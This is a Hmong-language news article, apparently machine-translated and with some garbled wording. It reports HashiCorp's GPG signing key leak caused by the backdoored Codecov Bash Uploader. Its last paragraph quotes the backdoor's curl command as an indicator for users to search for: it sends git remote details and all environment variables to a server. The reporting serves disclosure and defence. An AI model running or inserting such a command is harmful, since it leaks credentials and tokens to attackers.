HashiCorp, paub txog kev tsim cov cuab yeej qhib Vagrant, Packer, Nomad thiab Terraform, tshaj tawm qhov xau ntawm tus kheej GPG tus yuam sij siv los tsim cov ntawv kos npe digital uas txheeb xyuas kev tshaj tawm. Cov neeg tawm tsam uas tau nkag mus rau GPG tus yuam sij tuaj yeem ua qhov hloov pauv zais rau HashiCorp cov khoom lag luam los ntawm kev txheeb xyuas lawv nrog kos npe digital. Nyob rau tib lub sijhawm, lub tuam txhab tau hais tias thaum lub sijhawm kuaj xyuas, tsis muaj ib qho kev sim ua kom muaj kev hloov kho li no.
Tam sim no, tus yuam sij GPG cuam tshuam tau raug tshem tawm thiab tus yuam sij tshiab tau qhia hauv nws qhov chaw. Qhov teeb meem cuam tshuam tsuas yog kev txheeb xyuas siv SHA256SUM thiab SHA256SUM.sig cov ntaub ntawv, thiab tsis cuam tshuam rau tiam ntawm cov kos npe digital rau Linux DEB thiab RPM pob khoom muab los ntawm releases.hashicorp.com, nrog rau kev tso tawm kev pov thawj mechanisms rau macOS thiab Windows (AuthentiCode) .
Qhov xau tshwm sim vim yog siv Codecov Bash Uploader (codecov-bash) tsab ntawv hauv cov txheej txheem, tsim los rub tawm cov ntawv ceeb toom los ntawm kev sib koom ua ke txuas ntxiv. Thaum lub sij hawm tawm tsam ntawm lub tuam txhab Codecov, lub backdoor tau muab zais rau hauv cov ntawv teev tseg, los ntawm cov passwords thiab encryption keys raug xa mus rau cov neeg tua neeg lub server.
Txhawm rau hack, cov neeg tawm tsam tau coj kom zoo dua ntawm qhov yuam kev hauv cov txheej txheem tsim cov duab Codecov Docker, uas tso cai rau lawv rho tawm cov ntaub ntawv nkag mus rau GCS (Google Cloud Storage), tsim nyog los hloov pauv rau Bash Uploader tsab ntawv faib los ntawm codecov.io lub vev xaib. Cov kev hloov pauv tau rov qab rau Lub Ib Hlis 31, tseem tsis tau kuaj pom tau ob lub hlis thiab tso cai rau cov neeg tawm tsam kom rho tawm cov ntaub ntawv khaws cia hauv cov neeg siv khoom txuas mus ntxiv qhov system ib puag ncig. Siv cov lej tsis zoo ntxiv, cov neeg tawm tsam tuaj yeem tau txais cov ntaub ntawv hais txog Git qhov chaw cia khoom kuaj thiab txhua qhov chaw ib puag ncig, suav nrog tokens, encryption keys thiab passwords xa mus rau kev sib koom ua ke txuas ntxiv los npaj kev nkag mus rau daim ntawv thov code, repositories thiab cov kev pabcuam xws li Amazon Web Services thiab GitHub.
Ntxiv rau qhov kev hu ncaj qha, Codecov Bash Uploader tsab ntawv tau siv los ua ib feem ntawm lwm tus uploaders, xws li Codecov-action (Github), Codecov-circleci-orb thiab Codecov-bitrise-step, uas cov neeg siv kuj cuam tshuam los ntawm qhov teeb meem. Txhua tus neeg siv ntawm codecov-bash thiab cov khoom lag luam muaj feem raug pom zoo kom tshawb xyuas lawv cov kev tsim kho vaj tse, nrog rau kev hloov cov passwords thiab cov yuam sij encryption. Koj tuaj yeem tshawb xyuas qhov muaj qhov rov qab hauv ib tsab ntawv los ntawm qhov muaj kab curl -sm 0.5 -d "$(git tej thaj chaw deb -v)<<<<<< ENV $(env)" http:// /upload/v2 || muaj tseeb
Tau qhov twg los: opennet.ru